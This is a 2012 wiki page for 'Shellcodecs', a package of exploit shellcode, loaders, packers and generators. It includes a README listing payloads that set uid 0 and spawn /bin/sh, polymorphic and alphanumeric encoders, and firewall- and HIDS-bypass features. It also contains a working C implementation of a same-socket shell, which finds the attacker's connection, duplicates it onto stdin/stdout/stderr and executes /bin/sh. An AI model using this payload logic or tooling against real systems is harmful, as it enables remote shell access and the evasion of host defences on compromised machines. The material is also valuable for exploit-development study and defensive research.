Difference between revisions of "Shellcodecs"

From NetSec

Revision as of 00:54, 2 December 2012

Shellcodecs is a collection of shellcodes, loaders, sources, and generators designed to ease the exploitation and shellcode programming process.


Loaders:

  • Unlinked 32-bit
  • Unlinked 64-bit
  • Dynamic C loader
  • Dynamic socket loader

Payloads:

  • setuid(0); execve('/bin/sh',0,0)
  • Alphanumeric execve('/bin/sh',0,0) 104 bytes
  • Same-socket-shell (Firewall bypass)
  • Dynamic linker (HIDS/HIPS bypass, syscall restriction bypass)
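How the same-socket-shell payload gets a shell without opening a new connection, written out in plain C as an added illustration (this is not the package's socket-reuse.s; the function names and the choice of getpeername(2) as the probe are this example's own): the payload locates the descriptor the exploit arrived on, dup2()s it onto stdin/stdout/stderr and execs /bin/sh, so the shell's traffic rides the connection the firewall has already allowed instead of a fresh bind or connect that a filter would drop. The demo in main() stands in for the victim's connection with a constructed AF_UNIX socketpair, so it runs with no network at all.

```c
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* Return the first descriptor in [lo, hi) that is a connected socket.
 * If peer_port is non-zero, additionally require an IPv4/IPv6 peer on
 * that TCP port (the attacker's source port), which singles out the
 * exploit's connection from other sockets the victim process holds.
 * Returns -1 when nothing matches. */
int find_connected_socket(int lo, int hi, uint16_t peer_port)
{
    for (int fd = lo; fd < hi; fd++) {
        struct sockaddr_storage peer;
        socklen_t len = sizeof peer;
        /* getpeername fails with EBADF (not open), ENOTSOCK (file/pipe)
         * or ENOTCONN (listening socket); all of those are skipped. */
        if (getpeername(fd, (struct sockaddr *)&peer, &len) != 0)
            continue;
        if (peer_port == 0)
            return fd;
        if (peer.ss_family == AF_INET &&
            ntohs(((struct sockaddr_in *)&peer)->sin_port) == peer_port)
            return fd;
        if (peer.ss_family == AF_INET6 &&
            ntohs(((struct sockaddr_in6 *)&peer)->sin6_port) == peer_port)
            return fd;
    }
    return -1;
}

/* Point stdin/stdout/stderr at the socket and replace the process with
 * a shell. No new connection is created, so whatever let the original
 * connection through also carries the shell. Returns -1 only if dup2 or
 * execve fails. */
int shell_on_socket(int sock)
{
    for (int i = 0; i < 3; i++)
        if (dup2(sock, i) < 0)
            return -1;
    if (sock > 2)
        close(sock);
    char *const argv[] = { "/bin/sh", NULL };
    char *const envp[] = { NULL };
    execve("/bin/sh", argv, envp);
    return -1;
}

int main(void)
{
    /* Constructed stand-in for the victim's connection: a connected
     * AF_UNIX pair, plus a pipe to show that non-sockets are skipped. */
    int sv[2], p[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0 || pipe(p) != 0) {
        perror("setup");
        return 1;
    }
    int pipe_hit = find_connected_socket(p[0], p[0] + 1, 0);
    int sock_hit = find_connected_socket(sv[0], sv[0] + 1, 0);
    printf("pipe fd %d -> %d (expect -1); socket fd %d -> %d\n",
           p[0], pipe_hit, sv[0], sock_hit);
    /* shell_on_socket(sock_hit) would hand /bin/sh to the peer; not run here. */
    return sock_hit == sv[0] ? 0 : 1;
}
```

In real shellcode the loop is usually bounded to a small fd range and the port filter is what prevents dup2()ing a logging or database socket by mistake; the AF_UNIX pair used here has no port, so the filtered form returns -1 on it, which is the behaviour you want on anything that is not the attacker's connection.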

Generators:

  • Shellcode extractor
  • Standard unlinked same-socket-shell generator
  • Dynamic socket-shell generator

  #            Shellcodecs::README
  # http://www.blackhatlibrary.net/shellcode
  #
  #          www.blackhatlibrary.net
  #
  #        Sponsored by Viral Security
  #            www.viralsec.com

Intro

 These shellcodes are provided with documentation located at
         http://www.blackhatlibrary.net/Shellcode
    !!!!!END USER IS LIABLE FOR THEIR OWN ACTIONS!!!!!

Prerequisites

   * Linux
   * GCC
   * Generators require Python 2.7
   * Automake

Building the code

   * tar xzvf shellcode.tgz
   * cd shellcode
   * make
   It is also possible to build only the x86 or only the x64
   binaries with "make x86" or "make x64".  Keep in mind that
   this package has more 64-bit than 32-bit support.

Using the tools

   [loaders]
   [generators]   

Package contents

    Unless otherwise noted, code is amd64.  There are various
    intel32 etc examples as well.  If you're unaware, amd64 is
    the Linux name for the 64-bit x86 architecture (x86-64), so
    it runs on 64-bit Intel CPUs as well as AMD ones.
    If you think you may have an out of date version, or that
    the official version is out-of-sync with the site, the
    latest sources are always available at:
        http://blackhatlibrary.net/Shellcode/Appendix
   Directory: loaders
       Description:   32-bit executable mmap-based shellcode loader
       Filename:      loader-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Loaders
       Length:        66 bytes
       Description:   64-bit executable mmap-based shellcode loader
       Filename:      loader-64.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Loaders
       Length:        79 bytes
       Description:   A dynamic loader for locally executable code
       Filename:      dynamic-loader.c
       Description:   A dynamic loader for remotely executable code
       Filename:      socket-loader.c
   Directory: environment
       Description:   A 32-bit getpc (%eax) example
       Filename:      getpc-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
       Length:        11 bytes
       Description:   A 64-bit getpc (%rax) example
       Filename:      getpc-64.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
       Length:        12 bytes
       Description:   Alternative 64-bit getpc (%rax) example
       Filename:      getpc-64-alt.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
       Length:        10 bytes
       Description:   Breakpoint detection code
       Filename:      int3-detect-64.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#int3_breakpoints
       Length:        24 bytes
       Description:   32-bit lastcall example code
       Filename:      lastcall-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#32-bit
       Length:        4 bytes
       Description:   64-bit lastcall example
       Filename:      lastcall-64.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#64-bit
       Length:        5 bytes
       Description:   Alphanumeric lastcall
       Filename:      lastcall-alphanum.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#Alphanumeric_2
       Length:        13 bytes
   Directory: null-free
       Description:   A very short setuid(0); execve('/bin/sh',0,0);
       Filename:      setuid_binsh.as
       Documentation: http://www.blackhatlibrary.net/Shellcode/Null-free
       Length:        32 bytes
       Description:   A small write-to-file payload
       Filename:      write-file-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Null-free
       Length:        90 bytes
   Directory: socket-reuse
       Description:   same-socket-shell payload
       Filename:      socket-reuse.s
       Documentation: http://blackhatlibrary.net/Shellcode/Socket-reuse
       Length:        115 bytes
       Description:   sends socket reuse shellcode 
       Filename:      socket-reuse.c
   Directory: self-modifying
       Description:   32-bit shellcode unpacker
       Filename:      decoder-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
       Length:        89 bytes
       Description:   64-bit decoder (mmap)
       Filename:      decoder.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
       Length:        102 bytes
       Description:   64-bit decoder
       Filename:      decoder-no-mmap.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
       Length:        69 bytes
       Description:   32-bit shellcode packer
       Filename:      packer-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#32_bit
       Length:        37 bytes
       Description:   64-bit shellcode packer
       Filename:      packer-64.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#64_bit
       Length:        55 bytes
   Directory: alphanumeric
       Description:   alphanumeric execve('/bin/sh',0,0)
       Filename:      ascii_binsh.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Alphanumeric
       Length:        111 bytes
       Description:   alphanumeric x86* compatible architecture detection stub
       Filename:      architecture_detection
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment
       Length:        15 bytes
   Directory: dynamic
       Description:   Self-linking exit code
       Filename:      linked-exit.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Dynamic
       Length:        135 bytes
       Description:   Self-linking socket reuse shellcode
       Filename:      linker-fd-reuse.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Dynamic#The_dynamic_shell
       Length:        268 bytes
       Description:   Self-linking polymorphic socket reuse shellcode
       Filename:      poly-linker-fd-reuse.s
       Documentation: None
       Length:        268 bytes
   Directory: generators
       Description:   Hash generator for self-linking shellcode 
       Filename:      hash-generator.s
       Documentation: None
       Length:        81 bytes
       Description:   Socket-reuse shellcode generator 
       Filename:      socket-reuse-generator.py
       Documentation: None
       
       Description:   Polymorphic socket reuse generator
       Filename:      poly-socket-reuse-generator.py
       Documentation: None
       
       Description:   Nicely assemble and output shellcode in a variety of formats (raw, hex, and as a C variable) 
       Filename:      shellcode-generator.py
       Documentation: None

Getting help

       Note: We are not your free tech support.
            03:54, 2 December 2012 (MSK)
          Reminder: Docs are available at
      http://www.blackhatlibrary.net/shellcode
  If you're using the tools and there's a problem, try
re-reading the documentation before asking a question.  If
you're absolutely sure it is a programming error and not
user error preventing the code from working properly, you
can let us know by joining our IRC or talking on the
shellcode talk page.

  If you'd like to pay for professional training on the
materials contained in this courseware, please contact our
sponsor at www.viralsec.com

Credits

 Lead developer:        Hatter
 Supporting developers: jtRIPper, eax
 Community:   www.blackhatlibrary.net
 Commercial:     www.viralsec.com